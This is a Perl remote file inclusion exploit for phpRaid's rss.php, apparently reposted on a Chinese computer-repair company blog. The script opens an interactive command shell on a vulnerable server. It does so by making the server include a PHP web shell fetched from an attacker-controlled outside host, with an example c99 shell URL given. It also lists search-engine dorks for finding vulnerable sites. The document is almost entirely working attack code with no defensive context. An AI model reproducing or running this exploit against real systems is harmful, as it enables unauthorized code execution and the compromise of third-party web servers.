phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File

  #!/usr/bin/perl
  # phpraid <= 3.x.x (rss.php) remote file inclusion exploit
  # download script : http://up.9q9q.net/up/index.php?f=994a86950
  # founded & coded by: cold z3ro , cold-z3ro@hotmail.com
  # dork : inurl:"phpraid" , "phpraid" , "roster.php?sort=race"
  # perl cold-z3ro.pl
  # cmd shell example:
  # exploit : http://www.example.com/phpraid_path/rss.php?phpraid_dir=evil-script?
  ##
  use lwp::useragent;
  $path = $argv[0];
  $pathtocmd = $argv[1];
  $cmdv = $argv[2];
  if($path!~/http:\/\// || $pathtocmd!~/http:\/\// || !$cmdv){usage()}
  head();
  while()
  {
  print "[shell] \$";
  while()
  {
  $cmd=$_;
  chomp($cmd);
  $xpl = lwp::useragent->new() or die;
  $req = http::request->new(get =>$path.'rss.php?phpraid_dir='.$pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\ncould not connect\n";
  $res = $xpl->request($req);
  $return = $res->content;
  $return =~ tr/[\n]/[....]/;
  if (!$cmd) {print "\nplease enter a command\n\n"; $return ="";}
  elsif ($return =~/failed to open stream: http request failed!/ || $return =~/: cannot execute a blank command in /)
  {print "\ncould not connect to cmd host or invalid command variable\n";exit}
  elsif ($return =~/^.fatal.error/) {print "\ninvalid command or no return\n\n"}
  if($return =~ /(.*)/)
  {
  $finreturn = $1;
  $finreturn=~ tr/[....]/[\n]/;
  print "\r\n$finreturn\n\r";
  last;
  }
  else {print "[shell] \$";}}}last;
  sub head()
  {
  print "\n======================long life my home land palestine======================\r\n";
  print "\r\n";
  print "       * phpraid <= 3.x.x (rss.php) remote file inclusion exploit *\r\n";
  print "\r\n";
  print "============================================================================\r\n";
  }
  sub usage()
  {
  head();
  print "\r\n";
  print "  usage: perl cold-z3ro.pl \r\n\n";
  print "  - full path to example: http://www.site.com/phpraid/ \r\n";
  print "  - path to cmd shell e.g  http://b0rizq.by.ru/c99.txt? \r\n";
  print "  - cmd variable used in php shell like [ id ]\r\n";
  print "\r\n";
  print "============================================================================\r\n";
  print "\r\n";
  print "                     found  and  coded  by  cold z3ro \r\n";
  print "                       cold-z3ro[at]hotmail[dot]com \r\n";
  print "          greetz to: www.milw0rm.com , www.hack-teach.com , www.4azhar.com \r\n";
  print "                dork : inurl:phpraid , /roster.php?sort=race\r\n";
  print "\r\n";
  print "============================================================================\r\n";
  exit();
  }
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：